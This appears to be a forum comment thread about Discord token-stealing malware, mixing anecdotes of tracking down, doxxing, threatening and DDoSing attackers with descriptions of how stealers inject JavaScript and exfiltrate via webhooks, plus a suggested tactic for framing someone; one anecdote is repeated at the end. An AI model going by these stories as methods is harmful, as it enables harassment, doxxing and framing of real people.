I did the same thing to someone who attacked my gf in high school. They got her with subseven which was extremely easy to remove. Rather than just erase it, I took a copy home with me and analyzed it. Running the strings command uncovered the subseven signatures.. Turns out there was tooling that allowed you to modify the binary and redistribute it. Except the binary had an ICQ address to alert him to my gf’s online presence. He also had his AIM screen name, full name and city in his profile.
So I socially engineered him by posing as a classmate. I told him I was going to come by to get the homework for English. He wasn’t sure but I somehow convinced him and got his address. I don’t know why they always talk to strangers, but just like the article the dude responded. I got my friend and we went to pay him a visit.
Rang his doorbell, “hi is this l33th4x0r?”. He nodded but had no clue who I was. I mentioned my gf’s screen name and you could see the color leave his face. He stuttered and stammered about how he was just playing and didn’t mean to cause any problems. I said some stern words then left him wondering wtf I was and what just happened.
Kinda wish I saved the details (screen name, address, etc) just because of how epic it was at the time
I had fun with people on forums trying to get others to download keyloggers and the like. A lot of these were the stereotypical "script kiddies" who didn't know how much personal data they were giving away or even how the tools they used worked. I distinctly remember a few "C:\Documents and Settings\<uncommon first and last name>\...", from which I could find and sometimes phone them (often their parents would answer), but I drew the line at doing anything physical --- they were all far away anyway.
The most interesting results include apologies; one kid's father registered on the forum to post one for his son. Spamming a keylogger's logs with the physical address of its owner and "I know where you live" tends to cause them to repent in fear pretty quickly.
> I distinctly remember a few "C:\Documents and Settings\<uncommon first and last name>\...", from which I could find and sometimes phone them (often their parents would answer)
so this sounds like a pretty devious attack if you want to get someone, pose as a script kiddie in online forum, put in C:\Documents and Settings\<their first and last name> in stuff, other identifying info maybe and then let others do the work.
I used to just DDOS people’s AIM and messengers if they crossed me, as a phantom curse attached to them and they had no idea the cause.
I would chat with them as normal at the same time, chuckling to myself as they kept falling offline following a barrage of emoticons and requests from my army of chat bots that made their process run out of memory.
Eventually I’d bore of it. Or have one of the chatbots tell them not to cross someone again. In your scenario I probably would have said it was the person he got the exploit from, instead of making a link to someone I care about.
Way way back in the day, my friend wrote a program that would format the user's Commodore 5 1/4" floppy disk (usually the one that also ran their BBS) if they just tried to load it. They didn't even have to run it.
If someone screwed us, we'd create a new identity and upload a file named after a hot new pirated game to their BBS. Then sit back and watch the BBS go offline for a while.
Once in middle school, I wrote a fake format command and added it to autoexec.bat on my moms computer then promptly forgot about it because video games and sugar. Turns out she didn’t turn on her computer until Monday morning while I was at school. Mild mannered me was called to the principals office, expecting the worst. It was my mom on the phone frantically worried that her hard drive had just been nuked. I tell her what I did and she didn’t stop laughing for like 10 minutes. I was still grounded but I was allowed to use the computer or still play video games.
Niiiice, that reminds me of why I dont pirate Windows disk images any more, theyre all compromised! The “slim” builds with a buncha stuff deleted and also preloaded was nice, but now they just steal crypto.
I was going to write it earlier but I was content with the statute of limitations so just bring it up when I run for office, it pretty much has nothing to do with what you believe
I wrote about what happened, its a different reaction than the person I replied to - who actually visited the person instead of calling the police - there was no prowess associated with my response only that it was different and impersonal and also satisfactory, no more no less
Do you realize that if we’re talking about AIM and ICQ we are talking about 20 years ago? Maybe you didn't realize that, now that’s amusing. The sole purpose of this thread was “I can relate, I would approach it differently, here is a thing that happened”
> I am just saying you are regular busybody fucking asshole
I strongly believe this actually is language that goes against the CoC here on HN.
I think it would have had merit to reasonable talk about different points of view on the story, but any credibility goes down the drain in my book once people start not only to ad hominem others, but resort to language like you used.
Sad, as it could have been an interesting discussion to follow.
It's always PirateStealer, probably because it's open source so it's easy for people to pick up and use instead of exerting effort. Also, you can send a DELETE request to a Discord webhook without any auth, defusing the malware.
I'm still glad the DELETE thing works, I've reported a few times these with a complete writeup to Discord and all I got was a ticket being auto-closed after a month and the webhooks+servers still being up. I personally no longer bother reporting, just straight delete the webhook to stop the spread. Makes you wonder what their security/support team is doing with all those tickets.
They may not have one, or have one that’s so underwater with larger issues that the rest of the org doesn’t know how to route things to them.
Hiring for technical security is hard—you need engineering expertise to find good people, and then you need someone with an infosec background to vet them.
Finding a combination of both is surprisingly rare and you usually find infosec folks who can define but not implement a security program, or an engineer that can implement a security program with no idea how to run or grow it.
I need more peers in this space. If you’re reading this and are a software engineer looking for a transition please do reach out—email is in my profile. There’s a huge demand for security engineers and not nearly enough engineers interested in doing it.
That depends entirely on their backgrounds. I myself do not. The status-quo here isn’t too different than anywhere else in the tech sector.
Many security engineers transition into infosec from related fields like IT, DevOps, Network Engineering, Product Engineering, or similar. This tends to work out well since security engineers work closely with all of those areas within an organization.
Yes, you can send a DELETE to a Discord Webhook, but these malware projects have clocked on in most situations and now forward Webhooks through their own domains.
For the example of PirateStealer, the kid who made it ran a website where you posted your webhook and it spat out an exe that hid your webhook behind the domain, they even sold "premium" copies with additional security but in reality once they put the webhook behind their own domains they were dual-hooking, so the information was actually sent to 2 webhooks instead of just the 1.
Most of the services to create this malware now hide it behind a domain rather than directly exposing the Webhook, so shutting it down isn't as easy.
Interesting article, but this type of malware has been spreading for months now. PirateStealer is definitely the most popular but it's been shutdown a few times by a discord group who are targeting this type of malware.
One of the tools they've built is https://sketchy.tel/ which can decompile piratestealer/extrack/bby.rip and more and shuts down the Webhook automatically.
There's a lot of other things we do in this community but I can't disclose it because we never know who's reading our messages and if they get found out the malware creators will adapt to stop us.
You beat me to this. This malware is better than some of the work my colleagues can do, and they're being paid a lot of money. Even though it has bad intentions, it's still good software.
I feel like a script kiddie is someone that ripped off good code from others, maybe made a few adjustments at most, and claimed it as their own in an attempt to look cool
A misquote or an edit in the original comment occurred, as it now appears as: "Finding the author of most common malware isn't hard."
This assertion is different (i.e. Finding the author of [the majority of] malware isn't hard..., versus Finding the author of [the most popularly-used] malware isn't hard...).
I don't call the authors of most original malware skript kiddies, that term is for the people who copy the common malware with at most a few edits or create Frankenstein creations out of multiple common sources.
Malware detection relies on signatures and/or heuristics. Signatures won't work with a brand new malware that hasn't been seen before. Heuristics can also be defeated.
Antimalware is great for the low hanging fruit but don't expect it to detect something where the author has put effort into it.
As the maintainer of a moderately popular Minecraft mod, I deal with “ratted” versions all the time. They are often obfuscated with popular free tools that can be reversed, and they always seem to use Discord webhooks that can be instantly deleted. I’ve seen hundreds, and they never seem to evolve in their methods, thought there have been some really nasty ones.
No, there's no direct API for that. What the malware does is inject javascript into your discord, so if you add any payment details to your account it will harvest the data and send it via the Webhook to the owner.
The injected code also will scan your friends for "rare" badges, like the Bot Developer, Early Supporter and Certified Moderator. They use this information to then target the malware to those people in the hopes they can sell the rare badge accounts.
I don't know the specifics, but I'd assume not, Discord has made big steps recently in stopping this sort of malicious activity by adding the "Report Spam" feature as well as creating their own phishing link database to help detect spam in private messages.
Discord knows it's a big issue and I'd hope they've attempted to mitigate the malware but there's no way to stop the actual injection, so really all they can do is code shuffle frequently to make the injected code redundant, but that'd rely on doing releases frequently and hoping everyone updates just as frequently.
I'm glad to hear they're taking things more seriously. They banned my original Discord account when I showed them a critical bug that allowed for remote viewing of another user's activity, both in real time and in logs.
Yeah, Discord is still just a bad with that.
If you join a server and find it's hosting illegal material and proceed to report the server, Discord will ban all members of that server, which includes you. It's created an environment in which no one wants to report anything to Discord, especially since if you appeal your ban you won't get unbanned as you were in the server.
I don't know what the redirect was but given the article is behind the Medium paywall, if it was a t.co redirect, it was probably the submitter's way to let everyone skip the paywall.
Our discord got hit by the same shit, targeted at our game admins.
We are the largest open source multiplayer video game on github, so (compromised) discord friends sending admins messages about "games they made" with exes in them was more effective then it should have been until news and announcements went out.
Why did you redact the identity of the scammer? Please name and shame them! These people need to be called out and it seems like you’ve got irrefutable proof.
These posts show up on every thread like this and it always strikes me as off. It's not that I think the scammer here deserves protection, but the impulse to "name and shame" makes me very uncomfortable.
I worry that supporting that impulse, even in cases like this, normalizes the use of internet lynch mobs to exact "justice" (for any subjective value of "justice" that can get enough steam).
Also it would be soo easy to frame someone. That is why we have the legal system we have in most countries. We want to be REALLY sure we get the right person before we do something about it.
Hey, I was not expecting a French speaker here :D Merci de ton commentaire ;) I'm just a beginner in malware analysis and I tried my best to give a starting point to people like me :)
So I socially engineered him by posing as a classmate. I told him I was going to come by to get the homework for English. He wasn’t sure but I somehow convinced him and got his address. I don’t know why they always talk to strangers, but just like the article the dude responded. I got my friend and we went to pay him a visit.
Rang his doorbell, “hi is this l33th4x0r?”. He nodded but had no clue who I was. I mentioned my gf’s screen name and you could see the color leave his face. He stuttered and stammered about how he was just playing and didn’t mean to cause any problems. I said some stern words then left him wondering wtf I was and what just happened.
Kinda wish I saved the details (screen name, address, etc) just because of how epic it was at the time